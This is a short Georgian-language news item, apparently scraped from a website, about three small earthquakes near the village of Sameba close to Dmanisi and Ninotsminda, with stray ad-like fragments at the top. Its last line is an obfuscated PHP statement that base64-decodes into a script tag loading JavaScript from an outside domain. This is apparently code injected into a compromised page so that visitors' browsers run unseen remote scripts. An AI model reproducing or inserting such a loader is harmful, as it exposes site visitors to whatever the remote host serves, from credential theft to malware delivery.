celsiusi
ავერსი შნაიდერი
დედამიწის შემსწავლელ მეცნიერებათა ინსტიტუტისა და სეისმური მონიტორინგის ეროვნული ცენტრის ინფორმაციით, საქართველოში კიდევ ერთი მიწისძვრა მოხდა.
 
მათივე ცნობით დმანისიდან სამხრეთ-დასავლეთით, სოფელ სამებასთან დაფიქსირდა. 
 
"დღეს თბილისის დროით 21:51 საათზე, დმანისიდან სამხრეთ-დასავლეთით 25 კმ-ში, სოფელ სამებასთან (20:04 ; 20:15 საათების მიწისძვრების ეპიცენტრული ზონა) მოხდა 3.0 (ML) მაგნიტუდის სიდიდის მიწისძვრა“, - ნათქვამია ინფორმაციაში.
 
სეისმური მონიტორინგის ეროვნული ცენტრის ცნობით, დღეს, ნინოწმინდასთან 11 წუთის განმავლობაში კიდევ 2 მიწისძვრა მოხდა.
 
პირველი ბიძგი თბილისის დროით, 20:04 საათზე, ნინოწმინდიდან აღმოსავლეთით 23 კმ-ში, სოფელ სამებასთან დაფიქსირდა, მაგნიტუდით, 3.1 (ML).
 
მეორე მიწისძვრა კი 20: 15 საათზე დაფიქსირდა, რომელიც 3.0 (ml) მაგნიტუდის სიმძლავრის იყო. 
 
1365
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");